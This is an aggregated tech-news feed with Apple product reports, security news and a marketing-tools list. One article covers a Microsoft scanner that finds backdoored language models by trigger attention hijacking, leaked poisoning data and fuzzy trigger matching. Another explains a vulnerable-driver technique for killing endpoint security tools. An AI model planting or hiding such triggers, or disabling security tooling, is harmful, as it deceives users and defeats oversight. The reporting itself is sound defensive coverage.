_811205.png)
_e196d8.png)
_32b3d9.png)
_1c53fe.png)
- 0 comments
- 49 views
-
Tech
Tech Articles from a wide variety of topics and categories
Global tablet shipments reportedly reached 162 million units in 2025, representing 9.8% year-over-year growth. The research firm said the strongest momentum occurred during the holiday quarter, when shipments reached 44 million units, also up 9.8% compared to the same quarter a year earlier. Omdia described the annual total as the highest shipment volume recorded since the surge in demand seen in 2020, partly caused by anticipation of memory supply constraints.
Apple was a key contributor to the market's late-year growth. Omdia says that Apple shipped 19.6 million iPads in the fourth quarter of 2025, representing a 16.5% year-over-year increase. The firm said this performance was driven by strong demand for the 11th-generation iPad and the M5 iPad Pro.
The fourth-quarter results increased Apple's market share to 44.9%. This placed Apple well ahead of other tablet vendors during the holiday quarter, with Samsung at 14.7%, Lenovo at 8.8%, Huawei at 6.9%, and Xiaomi at 6.4%. Other manufacturers collectively accounted for the remaining 18.3% of shipments.
The report also highlighted changes in how tablets are expected to be positioned in the coming years, including greater emphasis on ecosystem integration and artificial intelligence features:
Regional performance varied across the year. Omdia said Central and Eastern Europe recorded the fastest growth in 2025, followed by Asia Pacific. All regions experienced double-digit growth except North America, where vendor and retail discounting helped offset an otherwise declining trend during the holiday season.Tag: Omdia
This article, "iPad Demand Surges as Apple Strengthens Grip on Tablet Market" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 33 views
-
For those who have yet to watch the video, iFixit opens up the AirTag 2 and reveals what is new inside, including a redesigned speaker that is up to 50% louder than the one in the previous AirTag, according to Apple. The teardown also provides a look at the AirTag 2's second-generation Ultra Wideband chip and more.
The overall design of the AirTag 2 is similar to the original version of the item tracking accessory.
While a previous teardown showed that it is more difficult to remove the speaker in the AirTag 2, compared to the one in the original AirTag, iFixit was still able to disable the speaker's audible chime with the use of a soldering gun.
For those who are not familiar, the AirTag is a small accessory that you can attach to your backpack, keys, or other items. Then, you can track the location of those items in the Find My app on the iPhone, iPad, Mac, Apple Watch, and iCloud.com.
Apple released the new AirTag last month. In addition to the louder speaker, Precision Finding works up to 50% farther away from an item compared to the previous-generation model, and the overall Bluetooth tracking range is also improved.
Related Reading: AirTag 2 Hands-On: What's New and Should You Upgrade?Related Roundup: AirTagTags: iFixit, Teardown
This article, "iFixit Shares AirTag 2 Teardown, Here's What's New" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 30 views
-
It was initially reported that iPhone 18 Pro models would have fully under-screen Face ID, with only a front camera visible in the top-left corner of the screen. However, the latest rumors indicate that the devices will have only partially under-screen Face ID, which will result in a narrower Dynamic Island area.
Below, we have recapped 12 features rumored for the iPhone 18 Pro models, as of February 2026:
The same overall design is expected, with 6.3-inch and 6.9-inch display sizes, and a "plateau" housing three rear cameras
More power-efficient LTPO+ displays
A narrower Dynamic Island, resulting from Face ID being partially under the screen
Variable aperture for at least one rear camera
A20 Pro chip manufactured with TSMC's 2nm process and new packaging technology
A simplified Camera Control button with no swipe gestures
Design changes to the rear Ceramic Shield for MagSafe charging, potentially including a more frosted glass appearance
Apple-designed C1X or C2 modem for 5G/LTE cellular connectivity
Apple-designed N1 chip or newer for Wi-Fi 7, Bluetooth 6, and Thread
Web browsing via satellite
New color options under consideration: burgundy, brown, or purple
iPhone 18 Pro Max may be slightly thicker than the iPhone 17 Pro Max, perhaps to accommodate a larger batteryBookmark our iPhone 18 roundup to stay on top of future rumors.Related Roundup: iPhone 18Related Forum: iPhone
This article, "What to Expect From the iPhone 18 Pro After the Latest Rumor Reversal" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 34 views
-
Note: MacRumors is an affiliate partner with Woot. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.
You can get the Solo Loop for just $14.99 ($34 off) and the Braided Solo Loop for $29.99 ($69 off). All bands in this sale are in brand new condition and come with a one-year Apple limited warranty.
UP TO 70% OFFApple Watch Bands at Woot
Woot has reorganized the sale for 2026, with shoppers choosing their size before color this time around. Woot has size 1-12 of the Solo Loop and Braided Solo Loop available, but color and style availability varies within each size category.
Shoppers should note that this sale is focused on colors of the Braided Solo Loop and Solo Loop that Apple has stopped selling, and it doesn't include any of the new band colors. That being said, all of the bands in this sale are in new condition.
The entire sale is focused on Solo Loop and Braided Solo Loop Apple Watch bands, so you'll need to know the size that works best for you before you buy. Apple has a measurement tool on its website that you can use to determine your exact size.
If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.
Deals Newsletter
Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!
Related Roundup: Apple Deals
This article, "Woot's Apple Watch Band Sale Has Solo/Braided Loops at Massive Discounts" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 36 views
-
CNET this week published the results of a large-scale battery-life comparison based on testing conducted throughout 2025 across 35 smartphones sold in the United States. According to the report, Apple and OnePlus ranked as the two brands with the strongest battery performance overall, based on averaged results from multiple battery benchmarks.
The top-performing individual device in the testing was Apple's iPhone 17 Pro Max, which finished first overall despite not having the largest battery capacity among the tested phones. It has a battery capacity of 5,088 mAh, and its extended battery life is largely attributed to silicon efficiency and software optimization.
The iPhone 17 tied for second place alongside the OnePlus 15. The iPhone 17 achieved this ranking despite having the smallest battery capacity among the top-performing phones. The Poco F7 Ultra placed third, while the iPhone 17 Pro placed fourth in the overall rankings.
CNET's methodology included standardized tests using two benchmarks designed to minimize real-world variability. The first involved streaming video over Wi-Fi at full brightness for three hours, while the second was a 45-minute endurance test that included gaming, video streaming, social media scrolling, and a video call. Results from both tests were averaged to determine final rankings.
The iPhone 17 Pro Max again ranked first in the endurance benchmark, followed by the iPhone 17, iPhone 17 Pro, and iPhone 16e. The publication noted that Google's Pixel 10 and Pixel 10 Pro Fold also performed well in this specific test, along with Motorola's Razr.
The experiment also compared battery life across smartphone brands by averaging results from companies for which at least three models were tested. Apple and OnePlus ranked first and second respectively in overall brand battery performance. Motorola and Samsung followed in third and fourth place, while Google ranked fifth. Related Roundups: iPhone 16e, iPhone 17, iPhone 17 ProTags: Battery Life, CNETBuyer's Guide: iPhone 16e (Caution), iPhone 17 (Neutral), iPhone 17 Pro (Neutral)Related Forum: iPhone
This article, "iPhone 17 Pro Max vs. Android Battery Life: New Test Reveals Winner" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 31 views
-
- 0 comments
- 29 views
-
View the full article
- 0 comments
- 36 views
-
According to a new supply chain report from The Elec, Apple is evaluating transparent polyimide film as a protective layer that would sit on top of the ultra-thin glass used in the foldable display. The report says the company is currently testing two options for this outer film: polyethylene terephthalate (PET) and clear polyimide (CPI).
Most of today's foldable displays use ultra-thin glass to improve clarity and rigidity, but the glass still requires a flexible polymer film on top to prevent scratches and damage. This is the layer that users actually touch, making it a key factor in overall durability and feel.
Samsung currently uses PET film as the protective layer on top of the ultra-thin glass in its Galaxy Z Fold and Galaxy Z Flip devices. The Elec says Apple's evaluation of CPI is rooted in a wish to differentiate its approach. CPI is more expensive than PET, but has better surface hardness and scratch resistance.
Kolon Industry has apparently emerged as a potential supplier of the material. The company previously built a mass production line for CPI film after anticipating strong demand from upcoming foldable devices. China-based Lens Technology is expected to supply the ultra-thin glass for the foldable iPhone and will handle bonding the final protective film to the glass.
The final decision on the protective film is expected to be made soon as Apple continues testing remaining components of the first foldable iPhone. Other rumors suggest that the device will feature a 7.8-inch crease-free inner display, a 5.5-inch cover display, Touch ID, two rear cameras, the A20 chip, and the "C2" modem. It is expected to launch alongside the iPhone 18 Pro and iPhone 18 Pro Max later this year.Tags: Foldable iPhone, The Elec
This article, "Apple Hoping to Outdo Rivals With Tougher Display for Foldable iPhone" first appeared on MacRumors.com
Discuss this article in our forums
View the full article
- 0 comments
- 32 views
-
According to a Huntress report, the activity was observed during a customer investigation in early 2026 and involved the use of an old EnCase forensic driver (by Guidance Software) as part of the Bring Your Own Vulnerable Driver (BYOVD) technique to terminate Endpoint Detection and Response (EDR) processes from kernel mode.
The intrusion began with compromised SonicWall SSL VPN credentials, after which the attacker conducted internal reconnaissance and deployed a custom “EDR killer” binary.
“The attack was disrupted before ransomware deployment, but the case highlights a growing trend: threat actors weaponizing signed, legitimate drivers to blind endpoint security,” Huntress researchers said in a blog post. “The EnCase driver’s certificate expired in 2010 and was subsequently revoked, yet Windows still loads it, a gap in Driver Signature Enforcement that attackers continue to exploit.”
Microsoft did not immediately respond to CSO’s request for comments.
The BYOVD abuse
According to the researchers, the attack used a common technique of abusing a legitimate signed driver that already has kernel-level privileges. This gave the attackers direct, high-privilege access to the kernel, effectively allowing them to terminate almost any process they want, including security tooling.
Windows’ Driver Signature Enforcement, the policy requiring all kernel-mode drivers to be digitally signed by a trusted Certificate Authority (CA), doesn’t check certificate revocation lists at kernel load time. Researchers noted this to be a legacy behavior that remains exploitable because of backward compatibility features introduced years ago that allow an exception for drivers signed with certificates issued before July 29, 2015, that chain to a supported cross-signed CA.
The EnCase driver contains a timestamp from a VeriSign service, which the authentication check still considers valid. “When code is signed with a timestamp, Windows validates the signature against the time the signature was created, not the current date,” the researchers noted. “Because the driver was timestamped while the certificate was still valid (before January 31, 2010), the signature remains valid indefinitely, even though the certificate has since expired.”
Once in the kernel, the driver exposes an IOCTL interface that lets the malware terminate arbitrary processes with full system privileges. Among the functionality exposed are process termination commands that bypass user-mode safeguards for Protected Process Light (PPL) processes, the defenses EDR systems depend on to avoid tampering.
The kill list excluded Huntress
The EDR killer binary used in the Huntress-observed attack packed a 64-bit Windows executable and a custom encoded kernel driver payload, which it decoded into OemHwUpd.sys and installed as a kernel-mode service. Because Windows still honors its cryptographic signature, the attackers were able to load the driver.
Once the vulnerable driver was in place, the EDR killer compiled an internal list of 59 well-known security tool processes, hashing their names and continuously checking for their presence on the system. “The kill loop runs continuously with a 1-second sleep interval, ensuring any security process that restarts is immediately terminated again,” the researchers said.
Incidentally, Huntress said it wasn’t on the kill list. “While the EDR killer targets nearly every major EDR and AV vendor on the market, the Huntress agent was not among the 59 processes targeted for termination,” it added. Once the driver was written to disk, the binary established persistence by registering it as a Windows kernel service.
Huntress recommended enabling Microsoft’s Vulnerable Driver Blocklist on all supported Windows systems to prevent known abused drivers from loading. The researchers also advised enforcing strong access controls on remote access services, including MFA for VPNs such as SonicWall, and closely monitoring for suspicious driver installation activity. Where possible, organizations are also encouraged to enable virtualization-based security features like Hypervisor-protected Code Integrity (HVCI) to further restrict kernel-mode abuse.
View the full article
- 0 comments
- 226 views
-
Akira zählt zu den gefährlichsten Ransomware-Gruppen und ist bekannt für zahlreiche Angriffe auf deutsche Unternehmen. Nun hat es offenbar den Bremer Stahlhändler Buhlmann getroffen. In einem Darknet-Post verkündet die Hackergruppe, sensible Informationen von der Buhlmann Group gestohlen zu haben.
Die Angreifer drohen dem Unternehmen damit, 55 Gigabyte Daten zu veröffentlichen. Die Buhlmann Gruppe hat sich bisher noch nicht offiziell dazu geäußert. Gegenüber dem Regionalmagazin buten un binnen bestätigte eine Sprecherin, dass eine US-Tochterfirma von einem Cyberangriff betroffen sei. Das angegriffene IT-System werde jedoch nur in den USA genutzt.
Standort in Deutschland nicht betroffen
“Ein Zugriff auf IT-Systeme und Daten anderer Gesellschaften, insbesondere solcher in Deutschland und der EU ist nicht erfolgt und auch nicht möglich”, so die Unternehmenssprecherin. Daher seien auch keine Daten außerhalb vom Standort in den USA gefährdet.
Nach eigenen Angaben beschäftigt die Buhlmann Group rund 2.000 Mitarbeitende in 23 Ländern. Das Unternehmen erzielte im Jahr 2024 einen Jahresumsatz von 428 Millionen Euro.
Lesetipps:
Akira greift Bäckereikette Schäfer an
Akira attackiert Ideal Versicherung
View the full article
- 0 comments
- 52 views
-
- 0 comments
- 32 views
-
As enterprises deploy AI across customer support, software development, legal analysis and internal operations, a new data exposure surface has quietly emerged. It does not sit in databases, file systems or network links. It lives inside AI inference traffic an area that falls outside most traditional security models and visibility frameworks, as InfoWorld explains in its analysis of why AI is all about inference now.
This shift has happened quickly. In many organizations, AI systems have moved from pilot projects to core infrastructure in less than two years. Yet security architectures have not evolved at the same pace. The result is a widening gap between where sensitive data actually flows and where security teams are looking.
This gap is rapidly becoming one of the most overlooked security risks in modern enterprise environments.
AI prompts are high-value targets
AI prompts are often dismissed as transient inputs temporary strings of text that exist only for the duration of a request. In reality, they frequently contain some of the most sensitive data an organization possesses:
Proprietary source code and internal tooling Confidential documents and legal contracts Customer PII and financial records Strategic workflows and decision logic Recent industry analysis shows that enterprises are increasingly feeding sensitive proprietary data into generative AI systems to improve relevance and accuracy, particularly as organizations work to unlock internal data layers for AI-driven applications. InfoWorld has documented this trend in its discussion of getting the enterprise data layer unstuck for AI.
From a business perspective, this makes sense. AI systems perform best when they are grounded in real organizational knowledge. From a security perspective, however, it represents a fundamental change in how sensitive data is handled. Information that was once confined to controlled repositories is now being copied, transformed and transmitted as part of inference requests.
Unlike traditional data flows, prompts are rarely classified, sanitized or monitored. They pass through application layers, middleware, logging systems, observability pipelines and third-party services with minimal scrutiny. In many cases, they are treated as operational exhaust rather than as high-value data.
This creates a dangerous mismatch: some of the most sensitive data in the organization is flowing through one of the least protected pipelines.
Why existing controls fall short
Traditional security architectures were not designed for AI workloads, and the limitations become clear at the inference layer.
Encryption protects data only until it is decrypted for processing. At that point, prompts may be exposed to application memory, runtime environments, debugging tools, observability platforms and administrative access. While transport encryption remains essential, it does little to reduce exposure once data reaches the systems that actually perform inference.
Data loss prevention tools also struggle in this context. Legacy DLP solutions were built around structured data, well-defined patterns and predictable storage locations. AI prompts are dynamic, unstructured and context dependent. As a result, DLP tools often lack the semantic understanding needed to determine whether a prompt contains sensitive material or whether its use is appropriate. These limitations are well documented in discussions around why legacy DLP approaches fall short in modern data security environments.
Logging and observability introduce another layer of risk. To troubleshoot AI systems, teams often log prompts, responses and intermediate states. These logs are then shipped to centralized platforms, retained for long periods and accessed by broad groups of engineers. What begins as a debugging convenience can quickly become a repository of sensitive data stored far outside its original security perimeter.
In many environments, trust effectively stops at the API gateway. Beyond that boundary, AI inference traffic is implicitly trusted, even though it frequently crosses internal and external trust zones. This implicit trust model may have worked for traditional application architectures, but it is poorly suited to AI systems that blur the line between user input, internal data and external services.
Internal risk is the bigger threat
While external attackers remain a concern, internal exposure is often the more likely and less visible risk.
Over-permissioned service accounts, misconfigured logging pipelines, compromised credentials or legitimate insider access can all result in silent prompt leakage. Unlike traditional breaches, these exposures do not require exploitation of vulnerabilities. They occur as a byproduct of normal operations in complex environments.
AI systems exacerbate this risk because of their scale and frequency of use. A single application may generate thousands or millions of inference requests per day, each potentially containing sensitive data. Within that volume, misuse or accidental exposure can easily blend into normal traffic patterns.
Research into insider risk consistently shows that accidental exposure is far more common than malicious breach, particularly in cloud environments where ownership and responsibility are distributed across teams. AI systems add yet another layer of complexity, making it harder to answer basic questions about who can access inference data, where it is stored and how long it is retained.
Because AI usage is frequent and expected, abnormal access patterns may not trigger alarms. This makes AI inference an ideal low noise channel for data exposure one that does not resemble traditional indicators of compromise and is therefore difficult to detect with existing tools.
The quantum time bomb
Beyond immediate exposure, there is a longer term risk that security leaders can no longer afford to treat as theoretical: cryptographic durability.
AI prompts and responses often contain data that must remain confidential for many years source code that underpins competitive advantage, customer records subject to regulatory protection, proprietary processes and strategic decisions. Yet much of today’s AI inference traffic is protected using cryptographic methods designed primarily for short-term transport security, not long term confidentiality.
This distinction matters. Advances in quantum computing threaten to weaken many of the cryptographic algorithms currently used to protect data in transit and at rest. While large-scale, fault-tolerant quantum computers are not yet widely available, the associated risk is already present. Adversaries can capture encrypted data today and decrypt it later, once cryptographic assumptions fail.
Security agencies and standards bodies have explicitly warned about these “harvest now, decrypt later” threats. The National Institute of Standards and Technology has highlighted the need to assess which data assets require long-term protection in its post-quantum cryptography guidance.
AI significantly expands the volume of data that may fall into this category. Inference traffic often includes rich contextual information that would be highly valuable if decrypted in the future. Unlike traditional records, this data is frequently generated at scale and retained in logs, analytics systems or backups without clear lifecycle controls.
For regulated industries with long data-retention requirements such as finance, healthcare and critical infrastructure this creates a silent exposure window that extends far beyond current compliance cycles. Organizations may be meeting today’s regulatory requirements while unintentionally accumulating long-term cryptographic risk.
AI has unintentionally expanded not just the amount of sensitive data in motion, but the amount of data that must remain secure well into a post-quantum future often without organizations realizing it.
The bottom line for security leaders
This gap exists not because teams are careless, but because AI inference does not fit cleanly into existing security models. It crosses trust boundaries that were never designed with AI in mind and introduces data flows that traditional controls were never built to govern.
As AI becomes embedded in core enterprise workflows, the security implications of inference traffic can no longer be treated as an edge case. They represent a fundamental shift in how sensitive data is created, processed and exposed.
This is not a call for a specific solution, but a problem the industry can no longer afford to ignore.
This article is published as part of the Foundry Expert Contributor Network.
Want to join?
View the full article
- 0 comments
- 31 views
-
- 0 comments
- 31 views
-
In a blog post, the company said its research focused on identifying hidden triggers and malicious behaviors embedded during the training or fine-tuning of language models, which can remain dormant until activated by specific inputs.
Such backdoors can allow attackers to alter model behavior in subtle ways that enable data exposure or allow malicious activity to slip past traditional security controls unnoticed.
As enterprises increasingly rely on third-party and open-source models for applications ranging from customer support to security operations, the integrity of those models is under scrutiny.
“Unlike traditional software, where scanners look for coding mistakes or known vulnerabilities, AI risks can include hidden behavior planted inside a model,” said Sunil Varkey, a cybersecurity analyst. “A model may work normally but respond in harmful ways when it sees a secret trigger.”
That risk is more concerning because LLMs can be deployed without deep inspection, leaving security teams with limited visibility into their training or vulnerabilities.
Signatures that suggest backdoors
Microsoft’s researchers identified three observable indicators, or “signatures,” that suggest the presence of backdoors in language models.
One of the strongest indicators is a shift in how a model pays attention to a prompt when a hidden trigger is present. In backdoored models, trigger tokens tend to dominate the model’s attention, effectively overriding the rest of the input.
“We find that trigger tokens tend to ‘hijack’ the attention of backdoored models, creating a distinctive double triangle pattern,” Microsoft said.
The researchers also found that backdoored models may leak information about how they were poisoned. In some cases, specific prompts caused models to regurgitate fragments of the very training data used to insert the backdoor, including parts of the trigger itself.
Another key finding is that language model backdoors behave differently from traditional software backdoors. Rather than responding only to an exact trigger string, many backdoored models react to partial or approximate versions of the trigger.
Effectiveness of the scanner
Microsoft said the scanner does not require retraining models or prior knowledge of backdoor behavior and operates using forward passes only, avoiding gradient calculations or backpropagation to keep computing costs low.
The company also said it works with most causal, GPT-style language models and can be used across a wide range of deployments.
Analysts say that while the approach improves visibility into language model poisoning, it is an incremental advance rather than a breakthrough, noting that several leading EDR platforms already claim the ability to detect backdoors in open-weight LLMs.
The bigger question is how long such detection advantages will last.
“While this new scanner will help counter real-world attacker techniques currently, adversaries will adapt quickly to outflank this scanner,” said Keith Prabhu, founder and CEO of Confidis. “We are seeing a repeat of the ‘virus’ wars, where hackers kept evolving viruses to evade detection by using innovative techniques like polymorphic viruses.”
That said, the scanner is essential for companies that download open-source models to use or customize in their own systems, according to Varkey.
“For them, AI models become part of the supply chain, just like software libraries,” Varkey said. “The scanner is not a complete solution, but it is an important new layer of protection as AI adoption grows.”
View the full article
- 0 comments
- 36 views
-
Part of the challenge is that most boards don’t have cybersecurity practitioners and expertise, making it challenging to understand the linkage between technical risks and business impact. It’s the responsibility of the CISO to translate technical cybersecurity outcomes into business terms that enable board members to make well-informed decisions on future investments and financial protection for the business. Additionally, senior leadership teams need to be prepared to discuss concepts like risk appetite and potential degrees of business interruption. That’s because no amount of cybersecurity investment can guarantee zero disruptions; a certain amount of risk must be accepted.
Unfortunately, this unintentional communication gap comes with the nature of cyber threats. The board wants to know how well-positioned the company is to avoid costly business interruptions, regulatory penalties or class action lawsuits from cyber incidents. It’s tempting to rely on internal audits and regulatory compliance (such as SOC2 attestations), but these don’t provide a robust answer to cyber resilience: many companies have failed to stop cyberattacks despite extensive investments in cybersecurity tools and compliance. (In fact, Gartner predicts worldwide end-user spending on information security will reach $240 billion in 2026)
Cybersecurity leaders desperately need to prove the performance of cybersecurity investments and demonstrate confidently and with evidence that safeguards are working as intended all the time. There’s an obvious opportunity to change the conversation with boards and senior leadership teams.
Why trust fails: The limits of compliance and communication
Cybersecurity frameworks like NIST and CSF — and complying with these frameworks — are key. However, while they were designed to standardize and validate an acceptable level of controls, they don’t guarantee positive cybersecurity outcomes. Passing an audit once a year doesn’t mean your controls work every day. For instance, a misconfigured control can create direct breach exposure. A backup gap might break your recovery time objective (RTO) promise. A missing insurance requirement at the time of an attack could void coverage.
It’s tempting for CISOs to present heatmaps and dashboards that are too technical for board members. When executives ask why something is red, the conversation may wander into what seems to the board like subjectivity. The Securities and Exchange Commission (SEC) cybersecurity disclosure requirements have forced boards to engage. New rules have increased visibility and consequences for both boards and CISOs without necessarily improving fluency. CISOs are accountable but still lack the means to prove the outcome of their team’s work. Bridging the language gap between cybersecurity leaders and business requires translation, but it’s also an opportunity to redefine the role of cybersecurity and focus on the desired outcome sought after by business leaders: cyber resilience.
Building a common language to get to “Here’s the proof of cyber resilience”
CISOs can reframe the discussion using data and evidence. Modern cybersecurity tools produce a large volume of data and information on how they operate at any point in time, the status of controls deployed, the validation of configuration and more. There’s an opportunity to collect such data, sanitize it and derive continuous insights that validate, at any point in time, not just compliance with cybersecurity regulations but also overall cybersecurity posture. Because these insights are proof of actual state, the CISO can illuminate gaps in protection on an ongoing basis and either address these gaps or help the business determine mitigation priorities. And in some cases, a perfectly appropriate business decision is to accept a risk. It’s important to capture that acceptance formally, document why it was accepted and ensure that the acceptance is reviewed on an appropriate cadence so the level of risk over time doesn’t outpace a company’s appetite.
This will remove subjectivity and confusion from board reports. CISOs can show proof of readiness and effectiveness, and boards can interpret results in familiar business terms.
Practical steps for CISOs to prove resilience
Cybersecurity deployment is critical, but insufficient. Every day, even organizations with robust cybersecurity investments fall victim to cyber attacks. Board and business leaders put the burden on cybersecurity leaders, but actually demand more: they want cyber resilience.
Cyber resilience is the ability to continue critical operations under degraded circumstances, like a cyber incident, and the agility to return to normal operations quickly and with minimal financial impact. It’s more than the deployment of cybersecurity tools. Backups must be recoverable, and cyber insurance policies need to pay claims. Ideally, the organization knows how long it takes to restart systems from backup and has all information at hand for claims to be paid fully and quickly.
Today, no single role owns cyber resilience, but different aspects are the purview of the CISO (safeguards), the CIO (backups) and the CFO (insurance). Collaboration between all three is required to assess that all safeguards are in place. It’s also time to upgrade manual tracking of safeguards to evidence-based, automated tracking.
The next step is to shift from activity reporting to evidence sharing and decision support. This includes providing a clear view of the state of cybersecurity, which then surfaces risks that the business needs to make decisions on in terms of whether to mitigate or accept. To use evidence to demonstrate whether the business is meeting its goals for cyber resilience, data must replace prediction. Next, automate low-value work. Free teams from repetitive audit preparation by using tools to aggregate and provide tamper-proof evidence. Focus human expertise on strategy and decision-making for cyber resilience instead of administrative tasks.
Finally, educate and contextualize for the board. Deliver short, outcome-focused updates that tie cybersecurity performance to cyber resilience goals. Reinforce the point that business risk and continuity ultimately reside with the board, not the CISO.
Better language, stronger trust
Cyber resilience is a business problem, not an IT and cybersecurity problem. The board will understand it when evidence-driven communication fosters transparency, trust and clarity of action. As they hear information relayed in language they can understand, boards gain confidence in investments and governance decisions. This results in fewer redlines on board reports, more meaningful conversations and longer CISO tenures. It moves cybersecurity from a reactive cost center to a proactive value driver. When CISOs can show proof tailored to the company’s own risk tolerance, the conversation changes from uncertainty to clarity.
This article is published as part of the Foundry Expert Contributor Network.
Want to join?
View the full article
- 0 comments
- 38 views
-
Wenige Tage vor Beginn der Olympischen Winterspiele in Mailand und Cortina d’Ampezzo hat Italien mehrere russische Hackerattacken abgewehrt. Die Cyberangriffe hätten unter anderem einige Standorte der Winterspiele, darunter Hotels in Cortina, zum Ziel gehabt, sagte Außenminister Antonio Tajani. Auch Einrichtungen seines Ministeriums seien betroffen gewesen.
Tajani betonte während eines Besuchs in Washington, die Angriffe seien russischen Ursprungs gewesen. Er bedankte sich bei den Sicherheitsbehörden, die diese vereiteln konnten. “Die Cybersicherheit wird zu einem zentralen Faktor, daher bin ich sehr zufrieden. Selbstverständlich haben wir alle anderen zuständigen Behörden informiert”, sagte der Minister weiter.
Wie italienische Medien berichteten, haben sich die lokalen Behörden auf die Risiken durch Cyberattacken während der Winterspiele frühzeitig vorbereitet. Ein Team aus Fachleuten arbeitet demnach gemeinsam mit Experten der Organisatoren der Spiele daran, Angriffe auf das Großevent abzuwehren. Die Winterspiele beginnen am Freitag und dauern bis zum 22. Februar. (dpa/jm)
View the full article
- 0 comments
- 38 views
-
Most of the list has remained unchanged since 2021. In fact, the top item, broken access control, has been on the Open Worldwide Application Security Project’s list since it was first released in 2003.
“Everyone tries to craft their own authentication and access control mechanisms,” says Jeff Williams, CTO and cofounder at Contrast Security. Williams created the list and served as the chair of the OWASP board for eight years.
There are standard mechanisms out there, but most applications have specialized needs, he says. “I’ve seen some really god-awful horrific machines that people have built to do access control checks, and they don’t build them elegantly. They build them piece by piece. ‘Oh, we’re building this function, we need to do an access check’ — and they build their own access check. And almost nobody tests access control.”
A typical web application may have a hundred endpoints, Williams says, each one of which can be accessed by a number of different roles. “Now you have to make sure that each of those routes work in each of those roles. Most people do a scan of their application with one role in mind, like that of a normal user. And maybe with an admin user. But there could be twenty different roles, so it’s very difficult to verify.”
AI didn’t make the top ten list, but it was included in a “next steps” section of issues on the cusp of inclusion, in addition to a lack of application resilience and memory management failures.
This AI category is titled: X03:2025 Inappropriate Trust in AI Generated Code (‘Vibe Coding’).
“Although we didn’t have data to support the fact that AI-generated code is causing significantly more risk than human-written code available, thanks to community feedback, professional experience, and constant online sharing of such data, we felt it prudent to add a section,” says Tanya Janca, lead author of the OWASP Top 10.
Developers should read and fully understand AI-generated code before committing it, she says.
The OWASP Top 10 list is based on a combination of security data from a dozen different organizations, covering nearly 3 million applications, as well as a survey of 221 security experts, says security metrics expert Aram Hovsepyan, CEO at Codific and an OWASP contributing member.
Here are the top 10:
1 – Broken access control
When applications fail to properly enforce restrictions on what authenticated users are allowed to do, allowing attackers to access unauthorized functionality or data. For example, an attacker might manipulate an URL parameter to access another user’s account information or escalate their privileges from a regular user to an administrator. This item now includes server-side request forgery, which was its own list item in 2021.
2 – Security misconfiguration
Security settings are not properly defined, implemented, or maintained, leaving systems exposed to attack. Common examples include default credentials that are never changed, unnecessary features left enabled, verbose error messages that reveal sensitive information, or cloud storage buckets left publicly accessible. This vulnerability jumped from fifth place in 2021 to second place in 2025.
3 – Software supply chain failures
Attackers compromise software during the build, distribution or updates to inject malicious code that gets distributed to multiple organizations. For example, attackers might compromise a popular open-source library and inject malicious code that then gets incorporated into thousands of applications that depend on it or breach a vendor’s system to insert backdoors into legitimate software updates. This is a new list item, though there was a narrower related item in 2021 — vulnerable and outdated components.
“Developers have become a primary target for many online attacks now,” says Janca. “It is no longer a problem of including a library that has a questionable dependency.” Instead, she says, there are now active attacks against the IDE, against the CI/CD pipeline, against plugins and repositories, against developer workstations, and more. “The entire software supply chain is currently a focus for attackers,” she says.
4 – Cryptographic failures
Applications fail to properly protect sensitive data through encryption or use weak or broken cryptographic algorithms. Examples include transmitting sensitive data in clear text, using weak encryption algorithms, not properly validating SSL/TLS certificates, or storing passwords without proper hashing. These failures often lead to sensitive data exposure or system compromise. This item moved down from second place on 2021’s list.
5 – Injection
Untrusted data is submitted as part of a command or query, tricking the application into executing unintended commands or accessing unauthorized data. Examples range from cross-site scripting, where attackers inject malicious scripts into web pages viewed by other users, to SQL injection, where they use database queries to access or modify sensitive data. This item has also moved a couple of spots down on this year’s list.
6 – Insecure design
Security wasn’t properly considered during the design phase of the application, resulting in missing or ineffective controls. Examples include failing to implement proper threat modeling, not establishing security requirements before development begins, or designing systems that lack defense in depth. This category was introduced in 2021 to focus on design and architectural flaws rather than implementation bugs, but it’s moved down a couple of places because the industry has made noticeable improvements in threat modeling.
7 – Authentication failures
Applications fail to properly verify the identity of users or fail to protect authentication credentials and session tokens. Examples include allowing brute force attacks, permitting weak passwords, exposing session IDs in URLs, not properly invalidating sessions after logout, or failing to implement multi-factor authentication for sensitive functions.
8 – Software or data integrity failures
Applications fail to maintain trust boundaries and verify the integrity of software, code, and data artifacts. Examples include applications that rely on plugins, libraries, or modules from untrusted sources without integrity checks, insecure CI/CD pipelines that allow code to be modified before deployment, or applications that auto-update without verifying digital signatures.
9 – Security logging and alerting failures
Applications fail to log security-relevant events or fail to alert security teams when suspicious activities occur. Examples include not logging failed login attempts, storing logs locally without backup, logging insufficient detail to reconstruct attacks or generating logs that don’t integrate with security information and event management (SIEM) systems. Great logging with no alerting is of minimal value in identifying security incidents.
10 – Mishandling of exceptional conditions
Applications fail to properly handle errors, edge cases, and abnormal conditions, leading to security vulnerabilities. Examples include displaying detailed error messages that reveal sensitive information about system architecture, security checks that fail and allow unauthorized access when errors occur, or applications that crash and expose sensitive data in memory dumps.
This is a category that has been just outside the top 10 for several years, says Brian Glas, department chair of computer science at Union University and an OWASP project leader. What took this item over the top was not the data about existing vulnerabilities, he says, but the survey of experts.
“If it was purely data-driven, we would not have an accurate list as it would only be looking into the past.”
Related stories:
10 most critical LLM vulnerabilities Managing agentic AI risk: Lessons from the OWASP Top 10 Understanding OWASP’s Top 10 list of non-human identity critical risks Keeping up with AI: OWASP LLM AI Cybersecurity and Governance Checklist
View the full article
- 0 comments
- 42 views
-
- 0 comments
- 56 views
-
- 0 comments
- 35 views
-
Digital marketing platforms tools are an all-in-one suite of technologies that help businesses manage customer engagement, automate campaigns, analyze results, and refine strategy across digital channels. In 2026, as artificial intelligence, real-time analytics, and conversational commerce become mainstream, these platforms are crucial for maintaining agility and competitiveness. When choosing a platform, businesses should weigh factors such as integration flexibility, pricing transparency, AI capabilities, ease of use, cross-channel support, and scalability.
Top 10 Digital Marketing Platforms Tools (2026)
Based on expert insights and industry usage, here are 10 standout tools:
1. Omnisend
Short Description: E-commerce-focused email, SMS & push marketing automation.
